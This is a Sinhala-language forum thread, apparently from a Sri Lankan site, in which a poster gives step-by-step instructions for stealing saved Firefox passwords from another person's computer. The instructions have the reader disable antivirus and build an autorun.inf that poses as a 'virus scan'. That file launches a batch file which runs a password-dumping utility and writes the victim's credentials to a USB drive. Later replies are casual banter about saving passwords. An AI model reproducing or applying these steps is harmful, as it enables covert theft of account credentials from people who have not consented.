password_හොරකංකරමු?

B_i_n_g_o

Well-known member
  • Oct 20, 2012
    5,327
    2,180
    113
    Among Web Pages
    අද පෝය. පෝය දවසෙ හොර වැඩක් කරන හැටි කියල දෙන්නයි හදන්නෙ:sorry:. පාස්වර්ඩ් හොරකම් කරන ලේසි ක්‍රමයක් ගැන.

    1. මේ ක්‍රමයෙන් හොරකම් කරන්න පුළුවන්
    ෆයර්ෆොක්ස් වෙබ් බ්‍රව්සරයේ සේව් කරල තියන පාස්වර්ඩ් විතරයි (Facebook, Gmail, Yahoo, Elakiri ඔය ඕනෙම මගුලක්).

    2. මේ ක්‍රමයට ක්‍රියාත්මක කරන්න නම් ඉස්සල්ලම ඔයාට කොහොමහරි සතුරගේ කම්පියුටර් එක ලඟට ගිහින් ඒක ඔන් කරගන්න වෙනව:frown:.

    3. Autorun උනේ නැත්තන් එක පාරක් launch.bat ෆයිල් එක ඩබල් ක්ලික් කරන්න:confused:.

    4. මම දාල තියන ලින්ක් එකේ තියෙන .exe ෆයිල් එක වයිරස් එකක් වත් ට්‍රෝජන් එකක්වත් නෙමෙයි. මගේ වයිරස් ගාඩ් එකෙන් ඒවා වයිරස් කියල පෙන්නන්නැහැ (Kaspersky 2013 - up to date).:cool:

    5. අන්තිම සහ වැදගත්ම කරුණ මේ ත්‍රෙඩ් එක CIAඑකේ, FBIඑකේ වෙබ්අඩවිය හැක් කරල ලෝකවර්තා තියල ඉන්න අපේ අයියලට නෙමෙයි. මේ ත්‍රෙඩ් එක "අනේ මමත් එහෙනම් පාස්වර්ඩ් එකක් හැක් කළා.. ආ..." කියල සිඟිති විදිහට සන්තෝස වෙන්න පුළුවන් දුප්පත් අහිංසක එළකිරි කොල්ලන්ට.:lol::lol::lol:

    හරි එහෙනම් වැඩේ පටාන් ගමු. ඉස්සල්ලම පහල දාල තියන ලින්ක් එකේ තියන පොඩි ප්‍රෝග්‍රෑම් එක ඩව්න්ලෝඩ් කරල පෙන්ඩ්‍රයිව් එකට දාගන්න. ඔයාලගෙ වයිරස්ගාඩ් එකෙන් මේ ප්‍රෝග්‍රෑම් එක වයිරස් එකක් කියල පෙන්නනවා නම් ටික වෙලාවකට වයිරස්ගාඩ් එක ඩිසේබල් කරන්න.

    http://www.nirsoft.net/utils/passwordfox.html

    දැන් අලුත් notepad ෆයිල් එකක් ඕපන් කරල පහල තියන statements ටික කොපි පේස්ට් කරන්න.

    [autorun]

    open=launch.bat

    ACTION= Perform a Virus Scan


    දැන් ඒ ෆයිල් එකේ නම autorun.inf නමින් රීනේම් කරල ඒකත් පෙන්ඩ්‍රයිව් එකට දාගන්න.

    දැන් තව අලුත් notepad ෆයිල් එකක් ඕපන් කරල පහල තියන statement එක කොපි පේස්ට් කරන්න.

    start passwordfox.exe /stext passwordfox.txt


    දැන් ඒ ෆයිල් එකේ නම launch.bat නමින් රීනේම් කරල ඒකත් පෙන්ඩ්‍රයිව් එකට දාගන්න.

    දැන් අපේ වැඩේ ඉවරයි. දැන් ඉතින් පෙන් එකත් අරන් පාස්වර්ඩ් හොරකමේ යන්න. පෙන් එක කම්පියුටර් එකට connect කලහම එන popup window එකෙන් Launch virus scan කියන option එක select කරන්න. මම කලින් කිව්ව මේ විදිහට ඔටෝරන් උනේ නැත්තන් කරන්න ඕනේ වැඩේ.

    දැන් ඔයාගේ පෙන් එකේ passwordfox කියල අලුත් ෆයිල් එකක් ක්‍රියේට් වෙලා එකේ ෆයර්ෆොක්ස් වෙබ්බ්‍රව්සර් එකේ සේව් කරල තිබුන ඔක්කොම පාස්වර්ඩ් සේව් වෙලා ඇති. හොඳ වැඩේ කම්මැලිකමට පාස්වර්ඩ් සේව් කරල තියන උන්ට:angry:.

    ලඟදි දාපු ත්‍රෙඩ්....

    පොළවපලං_ආපු_සබ්මැරීනය

    විනාශයට_පෙරසූදානම

    පාට_පාට_බඩඉරිඟු

    අහසේ_වැටෙන_සෙවනැල්ල


     
    Last edited:

    D@sun

    Well-known member
  • Oct 25, 2011
    7,652
    662
    113
    Somewhere I Belong ... !
    picture.php
    try 1ක් දීල බලන්නම්කෝ බිංගෝ !!!
     

    D@sun

    Well-known member
  • Oct 25, 2011
    7,652
    662
    113
    Somewhere I Belong ... !
    හොඳ වැඩේ කම්මැලිකමට පාස්වර්ඩ් සේව් කරල තියන උන්ට:angry:


    එහෙම කියන්න එපා බන් :sorry: හැමතිස්සෙම ඕක කොට කොට ඉන්න බෑ :oo: ...

    අනික .. password කීයක් කියලා මතක තියාගන්න ද? :eek:


    ... t4s ;) [ same වටේ ගිහින් එන්නලු :P ]
     
    Last edited:

    B_i_n_g_o

    Well-known member
  • Oct 20, 2012
    5,327
    2,180
    113
    Among Web Pages
    එහෙම කියන්න එපා බන් :sorry: හැමතිස්සෙම ඕක කොට කොට ඉන්න බෑ :oo: ...

    අනික .. password කීයක් කියලා මතක තියාගන්න ද? :eek:


    ... t4s ;)
    ඔව් ඉතින්:rolleyes: උඹලට එහෙම කිව්වට මමත් පාස්වර්ඩ් සේව් කරගෙන තමයි ඉන්නෙ:lol: